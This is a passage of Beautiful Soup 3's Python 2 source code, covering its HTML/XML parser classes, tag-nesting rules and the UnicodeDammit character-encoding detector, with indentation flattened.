"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
NESTING_RESET_TAGS maps out of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif hasattr(portion, '__iter__'): # is a list
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
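# Quick illustration of buildTagMap (hypothetical values): list items map to
# the default, while partial maps are merged as-is, so
#   buildTagMap([], ('span', 'font'), {'li': ['ul', 'ol']})
# returns {'span': [], 'font': [], 'li': ['ul', 'ol']}.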
# Now, the parser classes.
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
PRESERVE_WHITESPACE_TAGS = []
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
XHTML_ENTITIES = "xhtml"
# TODO: This only exists for backwards-compatibility
ALL_ENTITIES = XHTML_ENTITIES
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None, isHTML=False):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
sgmllib will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
sgmllib, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke sgmllib:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
# Set the rules for how we'll deal with the entities we
# encounter
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
if convertEntities == self.HTML_ENTITIES:
self.convertXMLEntities = False
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = True
elif convertEntities == self.XHTML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = False
elif convertEntities == self.XML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
else:
self.convertXMLEntities = False
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
SGMLParser.__init__(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed(isHTML=isHTML)
except StopParsing:
pass
self.markup = None # The markup can now be GCed
def convert_charref(self, name):
"""This method fixes a bug in Python's SGMLParser."""
try:
n = int(name)
except ValueError:
return
        if not 0 <= n <= 127:  # ASCII ends at 127, not 255
return
return self.convert_codepoint(n)
def _feed(self, inDocumentEncoding=None, isHTML=False):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
if markup:
if self.markupMassage:
if not hasattr(self.markupMassage, "__iter__"):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
# TODO: We get rid of markupMassage so that the
# soup object can be deepcopied later on. Some
# Python installations can't copy regexes. If anyone
# was relying on the existence of markupMassage, this
# might cause problems.
del(self.markupMassage)
self.reset()
SGMLParser.feed(self, markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
#print "__getattr__ called on %s.%s" % (self.__class__, methodName)
if methodName.startswith('start_') or methodName.startswith('end_') \
or methodName.startswith('do_'):
return SGMLParser.__getattr__(self, methodName)
elif not methodName.startswith('__'):
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
SGMLParser.reset(self)
self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = u''.join(self.currentData)
if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
not set([tag.name for tag in self.tagStack]).intersection(
self.PRESERVE_WHITESPACE_TAGS)):
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
        stack up to but *not* including the most recent instance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in xrange(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in xrange(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
<p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
        isNestable = nestingResetTriggers is not None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in xrange(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
                #last occurrence.
popTo = name
break
if (nestingResetTriggers is not None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers is None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s: %s" % (name, attrs)
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs])
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not self.isSelfClosingTag(name) and not selfClosing:
self._smartPop(name)
if self.parseOnlyThese and len(self.tagStack) <= 1 \
and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
return
tag = Tag(self, name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or self.isSelfClosingTag(name):
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
return tag
def unknown_endtag(self, name):
#print "End tag %s" % name
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def _toStringSubclass(self, text, subclass):
"""Adds a certain piece of text to the tree as a NavigableString
subclass."""
self.endData()
self.handle_data(text)
self.endData(subclass)
def handle_pi(self, text):
"""Handle a processing instruction as a ProcessingInstruction
object, possibly one with a %SOUP-ENCODING% slot into which an
encoding will be plugged later."""
if text[:3] == "xml":
text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
self._toStringSubclass(text, ProcessingInstruction)
def handle_comment(self, text):
"Handle comments as Comment objects."
self._toStringSubclass(text, Comment)
def handle_charref(self, ref):
"Handle character references as data."
if self.convertEntities:
data = unichr(int(ref))
else:
data = '&#%s;' % ref
self.handle_data(data)
def handle_entityref(self, ref):
"""Handle entity references as data, possibly converting known
HTML and/or XML entity references to the corresponding Unicode
characters."""
data = None
if self.convertHTMLEntities:
try:
data = unichr(name2codepoint[ref])
except KeyError:
pass
if not data and self.convertXMLEntities:
data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)
if not data and self.convertHTMLEntities and \
not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
# TODO: We've got a problem here. We're told this is
# an entity reference, but it's not an XML entity
# reference or an HTML entity reference. Nonetheless,
# the logical thing to do is to pass it through as an
# unrecognized entity reference.
#
# Except: when the input is "&carol;" this function
# will be called with input "carol". When the input is
# "AT&T", this function will be called with input
# "T". We have no way of knowing whether a semicolon
# was present originally, so we don't know whether
# this is an unknown entity or just a misplaced
# ampersand.
#
# The more common case is a misplaced ampersand, so I
# escape the ampersand and omit the trailing semicolon.
data = "&%s" % ref
if not data:
# This case is different from the one above, because we
# haven't already gone through a supposedly comprehensive
# mapping of entities to Unicode characters. We might not
# have gone through any mapping at all. So the chances are
# very high that this is a real entity, and not a
# misplaced ampersand.
data = "&%s;" % ref
self.handle_data(data)
def handle_decl(self, data):
"Handle DOCTYPEs and the like as Declaration objects."
self._toStringSubclass(data, Declaration)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as a CData object."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
data = self.rawdata[i+9:k]
j = k+3
self._toStringSubclass(data, CData)
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
      Most tags can't be nested at all. For instance, the occurrence of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
      Some tags can be nested arbitrarily. For instance, the occurrence
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup, MinimalSoup, or
BeautifulStoneSoup before writing your own subclass."""
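    # A minimal sketch of the nesting rules above (illustrative only):
    #   soup = BeautifulSoup('<p>Para1<p>Para2')
    #   # the second <p> implicitly closes the first, as described above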
def __init__(self, *args, **kwargs):
if not kwargs.has_key('smartQuotesTo'):
kwargs['smartQuotesTo'] = self.HTML_ENTITIES
kwargs['isHTML'] = True
BeautifulStoneSoup.__init__(self, *args, **kwargs)
SELF_CLOSING_TAGS = buildTagMap(None,
('br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base', 'col'))
PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])
QUOTE_TAGS = {'script' : None, 'textarea' : None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center')
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del')
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
'thead' : ['table'],
'tbody' : ['table'],
'tfoot' : ['table'],
}
NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre')
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
# Used to detect the charset in a META tag; see start_meta
CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)
def start_meta(self, attrs):
"""Beautiful Soup can detect a charset included in a META tag,
try to convert the document to that charset, and re-parse the
document from the beginning."""
httpEquiv = None
contentType = None
contentTypeIndex = None
tagNeedsEncodingSubstitution = False
for i in xrange(0, len(attrs)):
key, value = attrs[i]
key = key.lower()
if key == 'http-equiv':
httpEquiv = value
elif key == 'content':
contentType = value
contentTypeIndex = i
if httpEquiv and contentType: # It's an interesting meta tag.
match = self.CHARSET_RE.search(contentType)
if match:
if (self.declaredHTMLEncoding is not None or
self.originalEncoding == self.fromEncoding):
# An HTML encoding was sniffed while converting
# the document to Unicode, or an HTML encoding was
# sniffed during a previous pass through the
# document, or an encoding was specified
# explicitly and it worked. Rewrite the meta tag.
def rewrite(match):
return match.group(1) + "%SOUP-ENCODING%"
newAttr = self.CHARSET_RE.sub(rewrite, contentType)
attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
newAttr)
tagNeedsEncodingSubstitution = True
else:
# This is our first pass through the document.
# Go through it again with the encoding information.
newCharset = match.group(3)
if newCharset and newCharset != self.originalEncoding:
self.declaredHTMLEncoding = newCharset
self._feed(self.declaredHTMLEncoding)
raise StopParsing
tag = self.unknown_starttag("meta", attrs)
if tag and tagNeedsEncodingSubstitution:
tag.containsSubstitutions = True
class StopParsing(Exception):
pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close a 'b' tag
than to actually use nested 'b' tags, and the BeautifulSoup class
    handles the common case. This class handles the not-so-common
case: where you can't believe someone wrote what they did, but
it's valid HTML and BeautifulSoup screwed up by assuming it
wouldn't be."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big')
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',)
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
"""The MinimalSoup class is for parsing HTML that contains
pathologically bad markup. It makes no assumptions about tag
nesting, but it does know which tags are self-closing, that
<script> tags contain Javascript and should not be parsed, that
META tags may contain encoding information, and so on.
This also makes it better for subclassing than BeautifulStoneSoup
or BeautifulSoup."""
RESET_NESTING_TAGS = buildTagMap('noscript')
NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableString) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisiness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except ImportError:
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except ImportError:
pass
try:
import iconv_codec
except ImportError:
pass
class UnicodeDammit:
"""A class for detecting the encoding of a *ML document and
converting it to a Unicode string. If the source encoding is
windows-1252, can replace MS smart quotes with their HTML or XML
equivalents."""
# This dictionary maps commonly seen values for "charset" in HTML
# meta tags to the corresponding Python codec names. It only covers
# values that aren't in Python's aliases and can't be determined
# by the heuristics in find_codec.
CHARSET_ALIASES = { "macintosh" : "mac-roman",
"x-sjis" : "shift-jis" }
def __init__(self, markup, overrideEncodings=[],
smartQuotesTo='xml', isHTML=False):
self.declaredHTMLEncoding = None
self.markup, documentEncoding, sniffedEncoding = \
self._detectEncoding(markup, isHTML)
self.smartQuotesTo = smartQuotesTo
self.triedEncodings = []
if markup == '' or isinstance(markup, unicode):
self.originalEncoding = None
self.unicode = unicode(markup)
return
u = None
for proposedEncoding in overrideEncodings:
u = self._convertFrom(proposedEncoding)
if u: break
if not u:
for proposedEncoding in (documentEncoding, sniffedEncoding):
u = self._convertFrom(proposedEncoding)
if u: break
# If no luck and we have auto-detection library, try that:
if not u and chardet and not isinstance(self.markup, unicode):
u = self._convertFrom(chardet.detect(self.markup)['encoding'])
# As a last resort, try utf-8 and windows-1252:
if not u:
for proposed_encoding in ("utf-8", "windows-1252"):
u = self._convertFrom(proposed_encoding)
if u: break
self.unicode = u
if not u: self.originalEncoding = None
def _subMSChar(self, orig):
"""Changes a MS smart quote character to an XML or HTML
entity."""
sub = self.MS_CHARS.get(orig)
if isinstance(sub, tuple):
if self.smartQuotesTo == 'xml':
sub = '&#x%s;' % sub[1]
else:
sub = '&%s;' % sub[0]
return sub
def _convertFrom(self, proposed):
proposed = self.find_codec(proposed)
if not proposed or proposed in self.triedEncodings:
return None
self.triedEncodings.append(proposed)
markup = self.markup
# Convert smart quotes to HTML if coming from an encoding
# that might have them.
        if self.smartQuotesTo and proposed.lower() in ("windows-1252",
                                                       "iso-8859-1",
                                                       "iso-8859-2"):
markup = re.compile("([\x80-\x9f])").sub \
(lambda(x): self._subMSChar(x.group(1)),
markup)
try:
# print "Trying to convert document to %s" % proposed
u = self._toUnicode(markup, proposed)
self.markup = u
self.originalEncoding = proposed
except Exception, e:
# print "That didn't work!"
# print e
return None
#print "Correct encoding: %s" % proposed
return self.markup
def _toUnicode(self, data, encoding):
'''Given a string and its encoding, decodes the string into Unicode.
%encoding is a string recognized by encodings.aliases'''
# strip Byte Order Mark (if present)
if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16be'
data = data[2:]
elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16le'
data = data[2:]
elif data[:3] == '\xef\xbb\xbf':
encoding = 'utf-8'
data = data[3:]
elif data[:4] == '\x00\x00\xfe\xff':
encoding = 'utf-32be'
data = data[4:]
elif data[:4] == '\xff\xfe\x00\x00':
encoding = 'utf-32le'
data = data[4:]
newdata = unicode(data, encoding)
return newdata
def _detectEncoding(self, xml_data, isHTML=False):
"""Given a document, tries to detect its XML encoding."""
xml_encoding = sniffed_xml_encoding = None
try:
if xml_data[:4] == '\x4c\x6f\xa7\x94':
# EBCDIC
xml_data = self._ebcdic_to_ascii(xml_data)
elif xml_data[:4] == '\x00\x3c\x00\x3f':
# UTF-16BE
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
and (xml_data[2:4] != '\x00\x00'):
# UTF-16BE with BOM
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x3f\x00':
# UTF-16LE
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
(xml_data[2:4] != '\x00\x00'):
# UTF-16LE with BOM
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\x00\x3c':
# UTF-32BE
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x00\x00':
# UTF-32LE
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\xfe\xff':
# UTF-32BE with BOM
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\xff\xfe\x00\x00':
# UTF-32LE with BOM
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
elif xml_data[:3] == '\xef\xbb\xbf':
# UTF-8 with BOM
sniffed_xml_encoding = 'utf-8'
xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
else:
sniffed_xml_encoding = 'ascii'
pass
except:
xml_encoding_match = None
xml_encoding_match = re.compile(
'^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data)
if not xml_encoding_match and isHTML:
regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I)
xml_encoding_match = regexp.search(xml_data)
if xml_encoding_match is not None:
xml_encoding = xml_encoding_match.groups()[0].lower()
if isHTML:
self.declaredHTMLEncoding = xml_encoding
if sniffed_xml_encoding and \
(xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
'iso-10646-ucs-4', 'ucs-4', 'csucs4',
'utf-16', 'utf-32', 'utf_16', 'utf_32',
'utf16', 'u16')):
xml_encoding = sniffed_xml_encoding
return xml_data, xml_encoding, sniffed_xml_encoding
def find_codec(self, charset):
return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
or (charset and self._codec(charset.replace("-", ""))) \
or (charset and self._codec(charset.replace("-", "_"))) \
or charset
def _codec(self, charset):
if not charset: return charset
codec = None
try:
codecs.lookup(charset)
codec = charset
except (LookupError, ValueError):
pass
return codec
EBCDIC_TO_ASCII_MAP = None
def _ebcdic_to_ascii(self, s):
c = self.__class__
if not c.EBCDIC_TO_ASCII_MAP:
emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
201,202,106,107,108,109,110,111,112,113,114,203,204,205,
206,207,208,209,126,115,116,117,118,119,120,121,122,210,
211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
250,251,252,253,254,255)
import string
c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
''.join(map(chr, xrange(256))), ''.join(map(chr, emap)))
return s.translate(c.EBCDIC_TO_ASCII_MAP)
MS_CHARS = { '\x80' : ('euro', '20AC'),
'\x81' : ' ',
'\x82' : ('sbquo', '201A'),
'\x83' : ('fnof', '192'),
'\x84' : ('bdquo', '201E'),
'\x85' : ('hellip', '2026'),
'\x86' : ('dagger', '2020'),
'\x87' : ('Dagger', '2021'),
'\x88' : ('circ', '2C6'),
'\x89' : ('permil', '2030'),
'\x8A' : ('Scaron', '160'),
'\x8B' : ('lsaquo', '2039'),
'\x8C' : ('OElig', '152'),
'\x8D' : '?',
'\x8E' : ('#x17D', '17D'),
'\x8F' : '?',
'\x90' : '?',
'\x91' : ('lsquo', '2018'),
'\x92' : ('rsquo', '2019'),
'\x93' : ('ldquo', '201C'),
'\x94' : ('rdquo', '201D'),
'\x95' : ('bull', '2022'),
'\x96' : ('ndash', '2013'),
'\x97' : ('mdash', '2014'),
'\x98' : ('tilde', '2DC'),
'\x99' : ('trade', '2122'),
'\x9a' : ('scaron', '161'),
'\x9b' : ('rsaquo', '203A'),
'\x9c' : ('oelig', '153'),
'\x9d' : '?',
'\x9e' : ('#x17E', '17E'),
'\x9f' : ('Yuml', ''),}
#######################################################################
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print soup.prettify()
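# Illustrative invocation of the pretty-printer above (file names are
# hypothetical):
#   cat page.html | python BeautifulSoup.py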
|
qbektrix/pyglet
|
